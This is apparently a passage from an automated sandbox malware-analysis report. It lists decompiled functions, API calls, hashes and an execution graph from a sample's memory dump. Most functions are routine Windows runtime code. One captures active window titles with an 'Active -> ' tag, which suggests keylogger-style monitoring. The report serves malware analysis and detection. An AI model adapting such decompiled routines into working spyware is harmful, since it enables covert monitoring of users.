					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00404EE0( *_t49, E00404C80( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E0040B705);
				return E004049C0( &_v8);
			}













                                                    0x0040b62d
                                                    0x0040b630
                                                    0x0040b632
                                                    0x0040b636
                                                    0x0040b637
                                                    0x0040b63c
                                                    0x0040b63f
                                                    0x0040b644
                                                    0x0040b650
                                                    0x0040b65b
                                                    0x0040b666
                                                    0x0040b66d
                                                    0x0040b686
                                                    0x0040b66f
                                                    0x0040b677
                                                    0x0040b677
                                                    0x0040b69a
                                                    0x0040b6b3
                                                    0x0040b6c2
                                                    0x0040b6c8
                                                    0x0040b6e3
                                                    0x0040b6e3
                                                    0x0040b6c8
                                                    0x0040b6ea
                                                    0x0040b6ed
                                                    0x0040b6f0
                                                    0x0040b6fd

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6A6
                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DateFormatLocaleThread
                                                    • String ID: yyyy
                                                    • API String ID: 3303714858-3145165042
                                                    • Opcode ID: c40c53b5022c3b6d53ef6eb9169cbbe0f0549cacc423d75f4f5ec497cf9a52fc
                                                    • Instruction ID: 9bb3f367f0bbc217274b1ad28ba4a7515005ed0bbfdc0499212bfc9343ce28fe
                                                    • Opcode Fuzzy Hash: c40c53b5022c3b6d53ef6eb9169cbbe0f0549cacc423d75f4f5ec497cf9a52fc
                                                    • Instruction Fuzzy Hash: E42132B46041089BDB01EBA5C942AAE73A8EF48300F51447BF904F73D1D7789E04C7AE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A3E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = L00403BBC(1);
				_push(_t77);
				_push(0x42a46f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x418ef8; // 0x418f44
				 *((intOrPtr*)(_v12 + 0x6c)) = L00403D9C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x49e8b0);
				L00406FE0();
				_push(_t77);
				_push(0x42a4cf);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00428E6C(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x42a4d6);
				_push(0x49e8b0);
				L004071A0();
				return 0;
			}












                                                    0x0042a3e9
                                                    0x0042a3eb
                                                    0x0042a3f5
                                                    0x0042a404
                                                    0x0042a409
                                                    0x0042a40a
                                                    0x0042a40f
                                                    0x0042a412
                                                    0x0042a418
                                                    0x0042a41e
                                                    0x0042a431
                                                    0x0042a431
                                                    0x0042a439
                                                    0x0042a443
                                                    0x0042a44e
                                                    0x0042a44e
                                                    0x0042a454
                                                    0x0042a462
                                                    0x0042a467
                                                    0x0042a46a
                                                    0x0042a486
                                                    0x0042a48b
                                                    0x0042a492
                                                    0x0042a493
                                                    0x0042a498
                                                    0x0042a49b
                                                    0x0042a4a4
                                                    0x0042a4af
                                                    0x0042a4b2
                                                    0x0042a4b9
                                                    0x0042a4bc
                                                    0x0042a4bf
                                                    0x0042a4c4
                                                    0x0042a4c9
                                                    0x0042a4ce

                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave
                                                    • String ID: P>B
                                                    • API String ID: 3168844106-1256901731
                                                    • Opcode ID: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                    • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                    • Opcode Fuzzy Hash: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                    • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004769AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E004769AC(void* __ebx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _t28;
				intOrPtr _t32;
				void* _t37;
				intOrPtr* _t45;
				struct HWND__* _t48;
				intOrPtr _t55;
				intOrPtr _t67;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t67);
				_push(0x476a7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67;
				_t48 =  *(__edx + 4);
				if(_t48 > 0) {
					E0040500C( &_v8, GetWindowTextLengthA(_t48));
					_t28 = E00404C80(_v8) + 1;
					GetWindowTextA(_t48, E00404E80(_v8), _t28);
					_t32 =  *0x49ec6c; // 0x0
					E00408FF8(_t32,  &_v12);
					_push(_v12);
					E00408FF8(_v8,  &_v16);
					_pop(_t37);
					E00404DCC(_t37, _v16);
					if(_t28 != 0) {
						E00408FF8(_v8,  &_v20);
						if(_v20 != 0) {
							E00404A14(0x49ec6c, _v8);
							E00404CCC( &_v24, _v8, "Active -> ");
							_t45 =  *0x49ec44; // 0x0
							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(0x476a82);
				return E004049E4( &_v24, 5);
			}















                                                    0x004769b1
                                                    0x004769b2
                                                    0x004769b3
                                                    0x004769b4
                                                    0x004769b5
                                                    0x004769b9
                                                    0x004769ba
                                                    0x004769bf
                                                    0x004769c2
                                                    0x004769c5
                                                    0x004769ca
                                                    0x004769db
                                                    0x004769e8
                                                    0x004769f4
                                                    0x004769fc
                                                    0x00476a01
                                                    0x00476a09
                                                    0x00476a10
                                                    0x00476a18
                                                    0x00476a19
                                                    0x00476a1e
                                                    0x00476a26
                                                    0x00476a2f
                                                    0x00476a39
                                                    0x00476a49
                                                    0x00476a51
                                                    0x00476a5b
                                                    0x00476a5b
                                                    0x00476a2f
                                                    0x00476a1e
                                                    0x00476a62
                                                    0x00476a65
                                                    0x00476a68
                                                    0x00476a7a

                                                    APIs
                                                    • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                    • GetWindowTextA.USER32 ref: 004769F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: TextWindow$Length
                                                    • String ID: Active ->
                                                    • API String ID: 1006428111-2811066380
                                                    • Opcode ID: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                    • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                    • Opcode Fuzzy Hash: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                    • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043B290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t31;
				void* _t36;
				intOrPtr _t42;
				struct HDC__* _t47;
				void* _t50;

				_push(__esi);
				_v16 = 0;
				_t36 = __eax;
				_push(_t50);
				_push(0x43b326);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
					_v12 =  *((intOrPtr*)(__eax + 8));
					_v8 = 0xb;
					_t31 =  *0x49dc4c; // 0x422f30
					E00406A70(_t31,  &_v16);
					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
					E00404378();
				}
				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x43b32d);
				return E004049C0( &_v16);
			}











                                                    0x0043b297
                                                    0x0043b29a
                                                    0x0043b29d
                                                    0x0043b2a1
                                                    0x0043b2a2
                                                    0x0043b2a7
                                                    0x0043b2aa
                                                    0x0043b2b1
                                                    0x0043b2b6
                                                    0x0043b2b9
                                                    0x0043b2c6
                                                    0x0043b2cb
                                                    0x0043b2da
                                                    0x0043b2df
                                                    0x0043b2df
                                                    0x0043b2ec
                                                    0x0043b2f9
                                                    0x0043b30b
                                                    0x0043b312
                                                    0x0043b315
                                                    0x0043b318
                                                    0x0043b325

                                                    APIs
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                    • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClipIntersectLoadRectStringViewport
                                                    • String ID: 0/B
                                                    • API String ID: 2734429277-1373906003
                                                    • Opcode ID: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                    • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                    • Opcode Fuzzy Hash: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                    • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043B338 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0043B338(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E0041AC6C(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0043A91C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                    0x0043b341
                                                    0x0043b34e
                                                    0x0043b361
                                                    0x0043b365
                                                    0x0043b3b5
                                                    0x0043b3b5
                                                    0x0043b367
                                                    0x0043b367
                                                    0x0043b367
                                                    0x0043b371
                                                    0x0043b377
                                                    0x00000000
                                                    0x0043b37f
                                                    0x0043b384
                                                    0x0043b398
                                                    0x0043b3af
                                                    0x00000000
                                                    0x00000000
                                                    0x0043b3af
                                                    0x00000000
                                                    0x0043b3b1
                                                    0x0043b3b1
                                                    0x00000000
                                                    0x0043b367
                                                    0x0043b3b9
                                                    0x0043b3c2

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$EqualIntersect
                                                    • String ID: @
                                                    • API String ID: 3291753422-2766056989
                                                    • Opcode ID: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                    • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                    • Opcode Fuzzy Hash: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                    • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042F680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 55%
                                                    			E0042F680(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t28;
				int _t32;
				intOrPtr _t35;

				_push(0);
				_t23 = __eax;
				_push(_t35);
				_push(0x42f6ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				KillTimer( *(__eax + 0x34), 1);
				_t32 =  *(_t23 + 0x30);
				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0 && SetTimer( *(_t23 + 0x34), 1, _t32, 0) == 0) {
					_t18 =  *0x49de08; // 0x422f68
					E00406A70(_t18,  &_v8);
					E0040D144(_v8, 1);
					E00404378();
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(0x42f706);
				return E004049C0( &_v8);
			}









                                                    0x0042f683
                                                    0x0042f687
                                                    0x0042f68b
                                                    0x0042f68c
                                                    0x0042f691
                                                    0x0042f694
                                                    0x0042f69d
                                                    0x0042f6a2
                                                    0x0042f6a7
                                                    0x0042f6cb
                                                    0x0042f6d0
                                                    0x0042f6df
                                                    0x0042f6e4
                                                    0x0042f6e4
                                                    0x0042f6eb
                                                    0x0042f6ee
                                                    0x0042f6f1
                                                    0x0042f6fe

                                                    APIs
                                                    • KillTimer.USER32(?,00000001,00000000,0042F6FF,?,?,?,00000000), ref: 0042F69D
                                                    • SetTimer.USER32 ref: 0042F6BF
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timer$KillLoadString
                                                    • String ID: h/B
                                                    • API String ID: 1423459280-860576603
                                                    • Opcode ID: 529066ee03a2b6d127a9d6b04acc1eb89f9b5d8459c0dc1aaa59090bcc4611f3
                                                    • Instruction ID: c638335ebb45f94185b8bc64c2a04c90921daa6f7a9a6c3e75923d264c20285e
                                                    • Opcode Fuzzy Hash: 529066ee03a2b6d127a9d6b04acc1eb89f9b5d8459c0dc1aaa59090bcc4611f3
                                                    • Instruction Fuzzy Hash: C601B571B04210ABDB10EB61DC92F5A37BCDB45708FD1007AFD00AB2D2D7B9AC44C658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C794 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x49e92b != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x49e90c; // 0x42c794
					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x49e90c(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                    0x0042c79a
                                                    0x0042c7a4
                                                    0x0042c7ce
                                                    0x0042c7d7
                                                    0x0042c7ff
                                                    0x0042c7ff
                                                    0x0042c7d9
                                                    0x0042c7d9
                                                    0x0042c7de
                                                    0x00000000
                                                    0x00000000
                                                    0x0042c7de
                                                    0x0042c7a6
                                                    0x0042c7ab
                                                    0x0042c7b8
                                                    0x0042c7ca
                                                    0x0042c7ca
                                                    0x0042c80a

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C7E2
                                                    • GetSystemMetrics.USER32 ref: 0042C7F4
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$AddressProc
                                                    • String ID: MonitorFromPoint
                                                    • API String ID: 1792783759-1072306578
                                                    • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                    • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                    • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                    • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C66C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E0042C66C(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x49e92a != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x49e908; // 0x42c66c
					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x49e908(_t14, _t17);
				}
				return _t19;
			}












                                                    0x0042c672
                                                    0x0042c675
                                                    0x0042c67f
                                                    0x0042c6a4
                                                    0x0042c6ad
                                                    0x0042c6d4
                                                    0x0042c6d4
                                                    0x0042c681
                                                    0x0042c686
                                                    0x0042c693
                                                    0x0042c6a0
                                                    0x0042c6a0
                                                    0x0042c6df

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C6BD
                                                    • GetSystemMetrics.USER32 ref: 0042C6C9
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$AddressProc
                                                    • String ID: MonitorFromRect
                                                    • API String ID: 1792783759-4033241945
                                                    • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                    • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                    • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                    • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044AE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0044AE70(void* __eax, void* __edi, void* __esi) {
				void* _t16;
				intOrPtr _t17;
				void* _t18;
				void* _t19;

				_t19 = __esi;
				_t18 = __edi;
				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x449b38; // 0x449b84
					if(L00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						L00449F18();
					}
					E0044AC00(_t16, _t18, _t19);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}







                                                    0x0044ae70
                                                    0x0044ae70
                                                    0x0044ae71
                                                    0x0044ae77
                                                    0x0044ae7c
                                                    0x0044ae89
                                                    0x0044ae9a
                                                    0x0044ae8b
                                                    0x0044ae90
                                                    0x0044ae90
                                                    0x0044aea1
                                                    0x0044aea8
                                                    0x0044aea8
                                                    0x0044aeaf
                                                    0x0044aeaf
                                                    0x0044aeb8

                                                    APIs
                                                    • CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                    • CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMenu$Popup
                                                    • String ID: .B
                                                    • API String ID: 257293969-2011479308
                                                    • Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                    • Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
                                                    • Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                    • Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:9.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:1.5%
                                                    Total number of Nodes:1417
                                                    Total number of Limit Nodes:72
                                                    execution_graph 5768 3c3db7 TlsAlloc 5362 3c1330 5363 3c133a GetProcAddress 5362->5363 5364 3c1334 5362->5364 5366 3c135b 5363->5366 5367 3c1354 5363->5367 5365 3c2e90 66 API calls 5364->5365 5365->5363 5369 3c1eb0 85 API calls 5366->5369 5368 3c2e90 66 API calls 5367->5368 5368->5366 5370 3c1360 EnumResourceNamesA FreeLibrary 5369->5370 5769 3c52b0 5770 3c52c2 5769->5770 5772 3c52d0 @_EH4_CallFilterFunc@8 5769->5772 5771 3c2701 __NMSG_WRITE 5 API calls 5770->5771 5771->5772 5402 3c302e 5403 3c4882 __calloc_crt 66 API calls 5402->5403 5404 3c303a EncodePointer 5403->5404 5405 3c3053 5404->5405 5409 3c7924 5412 3c78d2 __CallSettingFrame@12 5409->5412 5410 3c7939 5423 3c795e 5410->5423 5412->5410 5417 3c3971 5412->5417 5415 3c794f __setmbcp 5416 3c3971 ___FrameUnwindToState 69 API calls 5416->5415 5428 3c4440 5417->5428 5419 3c397d DecodePointer 5420 3c398d 5419->5420 5429 3c3925 5420->5429 5424 3c3f5e __getptd 66 API calls 5423->5424 5425 3c7963 5424->5425 5426 3c7945 5425->5426 5427 3c3f5e __getptd 66 API calls 5425->5427 5426->5415 5426->5416 5427->5426 5428->5419 5430 3c3931 __setmbcp 5429->5430 5431 3c3f5e __getptd 66 API calls 5430->5431 5433 3c3936 5431->5433 5435 3c5372 5433->5435 5444 3c3a0f DecodePointer 5435->5444 5437 3c5377 5439 3c5382 5437->5439 5445 3c3a1c 5437->5445 5440 3c3bec __call_reportfault 8 API calls 5439->5440 5442 3c539a 5439->5442 5440->5442 5441 3c2ea6 _abort 66 API calls 5443 3c53a4 5441->5443 5442->5441 5444->5437 5449 3c3a28 __setmbcp 5445->5449 5446 3c3a83 5447 3c3a65 DecodePointer 5446->5447 5452 3c3a92 5446->5452 5453 3c3a54 _siglookup 5447->5453 5448 3c3a4f 5450 3c3ee5 __getptd_noexit 66 API calls 5448->5450 5449->5446 5449->5447 5449->5448 5455 3c3a4b 5449->5455 5450->5453 5454 3c4264 __setmbcp 66 API calls 5452->5454 5456 3c3aef 5453->5456 5458 3c2ea6 _abort 66 API calls 5453->5458 5465 3c3a5d __setmbcp 5453->5465 5457 3c3a97 5454->5457 5455->5448 5455->5452 5460 3c38f2 __lock 66 API calls 5456->5460 5462 3c3afa 5456->5462 5459 3c3d67 _raise 11 API calls 5457->5459 5458->5456 5459->5465 5460->5462 5463 3c3b2f 5462->5463 5466 3c3dae RtlEncodePointer 5462->5466 5467 3c3b83 5463->5467 5465->5439 5466->5463 5468 3c3b89 5467->5468 5469 3c3b90 5467->5469 5471 3c3819 LeaveCriticalSection 5468->5471 5469->5465 5471->5469 5773 3c75a5 5774 3c2701 __NMSG_WRITE 5 API calls 5773->5774 5775 3c75bb 5774->5775 5776 3c83b3 ___InternalCxxFrameHandler 71 API calls 5775->5776 5781 3c75c6 5775->5781 5777 3c75fe 5776->5777 5778 3c7615 5777->5778 5782 3c7411 RtlUnwind 5777->5782 5780 3c74ce _CallSETranslator 66 API calls 5778->5780 5780->5781 5782->5778 5783 3c44a0 5784 3c44cc 5783->5784 5785 3c44d9 5783->5785 5786 3c2701 __NMSG_WRITE 5 API calls 5784->5786 5787 3c2701 __NMSG_WRITE 5 API calls 5785->5787 5786->5785 5796 3c44e9 __except_handler4 __IsNonwritableInCurrentImage 5787->5796 5788 3c456c 5789 3c4542 __except_handler4 5789->5788 5790 3c455c 5789->5790 5791 3c2701 __NMSG_WRITE 5 API calls 5789->5791 5792 3c2701 __NMSG_WRITE 5 API calls 5790->5792 5791->5790 5792->5788 5794 3c45be __except_handler4 5795 3c45f2 5794->5795 5797 3c2701 __NMSG_WRITE 5 API calls 5794->5797 5798 3c2701 __NMSG_WRITE 5 API calls 5795->5798 5796->5788 5796->5789 5799 3c5342 RtlUnwind 5796->5799 5797->5795 5798->5789 5799->5794 5472 3c321e 5473 3c322d 5472->5473 5474 3c3233 5472->5474 5475 3c2ea6 _abort 66 API calls 5473->5475 5478 3c2ecb 5474->5478 5475->5474 5477 3c3238 __setmbcp 5479 